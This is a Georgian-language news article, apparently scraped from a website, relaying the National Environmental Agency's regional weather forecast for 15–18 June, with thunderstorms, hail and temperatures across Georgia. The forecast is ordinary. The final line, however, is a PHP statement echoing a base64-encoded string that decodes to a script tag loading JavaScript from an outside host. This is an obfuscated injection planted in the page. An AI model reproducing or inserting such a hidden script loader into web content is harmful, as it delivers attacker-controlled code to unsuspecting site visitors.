celsiusi
ავერსი საქკაბელი

გარემოს ეროვნული სააგენტოს ინფორმაციით, 15 ივნისს მაღალი ტემპერატურის ფონზე საქართველოს ცალკეულ რაიონში შენარჩუნებული იქნება ხანმოკლე წვიმა ელჭექით, ხოლო 16-17 ივნისს წვიმიანი ამინდი მოსალოდნელია ქვეყნის ტერიტორიის უმეტეს ნაწილზე.

ამასთან, დასავლეთ საქართველოში ჰაერის ტემპერატურა შედარებით დაიკლებს.

რაც შეეხება დედაქალაქს, მოსალოდნელია ხანმოკლე წვიმა ელჭექით. ელჭექის დროს შესაძლებელია ქარის გაძლიერება. ჰაერის ტემპერატურა დღისით +32, +34 გრადუსი დაფიქსირდება.

„სანაპირო რაიონებში (ბათუმი, ქობულეთი, ანაკლია, ფოთი) 15 ივნისს დღის ბოლოდან 18 ივნისამდე მოსალოდნელია წვიმა ელჭექით და ქარის გაძლიერება, ხოლო ჰაერის ტემპერატურა დღისით +25, +27 გრადუსი იქნება.

დასავლეთ საქართველოს დაბლობ რაიონებში (ზესტაფონი, ქუთაისი, სამტრედია, ზუგდიდი, მარტვილი, ოზურგეთი) კი, 15 ივნისს დღის ბოლოდან 18 ივნისამდე მოსალოდნელია წვიმა ელჭექით და ქარის გაძლიერება. ჰაერის ტემპერატურა 15 ივნისს დღისით +33, +35 გრადუსი იქნება, ხოლო 16-17 ივნისს +27, +29 გრადუსამდე დაიკლებს.

რაც შეეხება დასავლეთ საქართველოს მთიან რეგიონებს (ამბროლაური, ონი, ცაგერი, შოვი, ჭიათურა, საჩხერე, ხულო, რიკოთის უღელტეხილი), 15 ივნისს დღის ბოლოდან 18 ივნისამდე მოსალოდნელია წვიმა ელჭექით და ქარის გაძლიერება, შესაძლებელია სეტყვაც. ჰაერის ტემპერატურა 15 ივნისს დღისით +30, +32 გრადუსი იქნება, ხოლო 16-17 ივნისს +26, +28 გრადუსამდე დაიკლებს.

დასავლეთ საქართველოს მაღალმთიან რეგიონებში (მესტია, ბახმარო) ამავე პერიოდში მოსალოდნელია წვიმა ელჭექით და ქარის გაძლიერება. ჰაერის ტემპერატურა დღისით +20, +22 გრადუსი იქნება.

ხოლო ქართლში (რუსთავი, ბოლნისი, მარნეული, გარდაბანი, გორი, ცხინვალი) მოსალოდნელია დროგამოშვებით ხანმოკლე წვიმა ელჭექით, შესაძლებელია სეტყვა და ქარის გაძლიერება. ჰაერის ტემპერატურა დღისით +31, +33 გრადუსი იქნება.

რაც შეეხება მოსალოდნელ ამინდს კახეთში (საგარეჯო, თელავი, გურჯაანი, სიღნაღი, ლაგოდეხი, ყვარელი, ახმეტა, დედოფლისწყარო), 15 ივნისს დღის ბოლოდან 18 ივნისამდე ნავარაუდებია დროგამოშვებით ხანმოკლე წვიმა ელჭექით, შესაძლებელია სეტყვა და ქარის გაძლიერება. ჰაერის ტემპერატურა დღისით +32, +34 გრადუსი იქნება.

აღმოსავლეთ საქართველოს მთიან რეგიონებში (ახალციხე, ბორჯომი, დუშეთი, თიანეთი, ფასანაური), მოსალოდნელია დროგამოშვებით ხანმოკლე წვიმა ელჭექით, შესაძლებელია სეტყვა და ქარის გაძლიერება. ჰაერის ტემპერატურა დღისით +29, +31 გრადუსი იქნება.

აღმოსავლეთ საქართველოს მაღალმთიან რეგიონებში (ახალქალაქი, წალკა, ბაკურიანი, გუდაური, ომალო), 15 ივნისს დღის ბოლოდან 18 ივნისამდე მოსალოდნელია დროგამოშვებით ხანმოკლე წვიმა ელჭექით, შესაძლებელია სეტყვა და ქარის გაძლიერება. ჰაერის ტემპერატურა დღისით +19, +21 გრადუსი იქნება“,- აღნიშნულია გარემოს ეროვნული სააგენტოს ინფორმაციაში.

173
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");